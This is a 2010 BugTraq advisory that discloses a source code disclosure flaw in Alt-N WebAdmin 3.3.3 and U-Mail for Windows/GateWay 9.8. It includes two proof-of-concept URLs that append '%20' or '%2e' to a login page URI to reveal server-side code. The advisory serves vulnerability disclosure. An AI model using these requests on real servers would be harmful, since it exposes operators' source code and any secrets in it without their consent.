BugTraq
Alt-N WebAdmin Source Code Disclosure Dec 17 2010 02:11PM
wsn1983 gmail com
Vulnerable: v3.3.3

Vendor: www.altn.com

Category: Environment Error

Vulnerable

========

Alt-N WebAdmin 3.3.3

U-Mail for Windows V9.8

U-Mail GateWay for Windows V9.8

Details:

=========

A source code disclosure vulnerability exists with Alt-N WebAdmin Server.

Remote attacker can be exploited to disclose the source code by appending "%2e" or "%20" to a URI.

Test on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8

POC:

=========

http://ip:1000/login.wdm%20

http://ip:1000/login.wdm%2e

Reference:

=========

www.comingchina.com/download.html

http://www.nansec.com/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus